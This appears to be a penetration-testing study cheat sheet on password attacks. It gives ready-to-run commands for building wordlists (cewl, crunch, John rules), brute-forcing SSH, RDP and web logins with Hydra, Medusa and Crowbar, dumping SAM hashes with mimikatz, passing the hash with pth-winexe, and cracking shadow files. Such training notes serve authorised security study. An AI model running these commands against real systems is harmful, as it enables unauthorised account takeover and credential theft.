Wordlists - https://github.com/danielmiessler/SecLists

tool for building wordlists by scraping a website
cewl www.test.com -m6 -w test_wordlist.txt

John The Ripper
can modify JTR config to mutate the passwords however we want

sudo vim /etc/john/john.conf
# Try words as they are
:
# Lowercase every pure alphanumeric word
-c >3 !?X l Q
# Capitalize every pure alphanumeric word
-c (?a >2 !?X c Q
# Lowercase and pluralize pure alphabetic words
...
# Try the second half of split passwords
-s x_
-s-c x_ M l Q
# Add two numbers to the end of each password
$[0-9]$[0-9]

john --wordlist=test_wordlist.txt --rules --stdout > mutated.txt

========================================================================
Brute Force

Crunch - build a custom wordlist

CHARACTER -	CHARACTER TRANSLATION
@	Lower case alpha characters
,	Upper case alpha characters
%	Numeric characters
^	Special characters including space

crunch 8 8 -t ,@@^^%%%
crunch 4 6 123456789ABCDEF -o crunch.txt
crunch 4 6 -f /usr/share/crunch/charset.1st mixalpha -o crunch.txt
mixalpha - upper & lowercase
========================================================================
Common Network Service Attack Methods

THC-Hydra / Medusa / Crowbar / spray

medusa -h 1.2.3.4 -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin

crowbar --> more for SSH keys; RDP attacks
crowbar -b rdp -s 1.2.3.4/32 -u admin -C ~/password-file.txt -n 1

THC-Hydra
hydra -l kali -P /usr/share/wordlists/rockyou.txt ssh://1.2.3.4
hydra 1.2.3.4 http-form-post "/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" -l admin -P /usr/share/wordlists/rockyou.txt -vV -f
========================================================================
Password Hashes

hashid <hash> - tries to assess the algorithm used

mimikatz - can dump SAM hashes via in memory attacks
privilege::debug
token::elevate

lsadump::sam

Pass the hash
(in Win)
pth-winexe -U offsec%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //1.2.3.4 cmd

Password cracking
john hash.txt --format=NT
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=NT
john --rules --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=NT

unshadow passwd.txt shadow.txt > unshadowed.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

hashcat - used both CPU and GPU


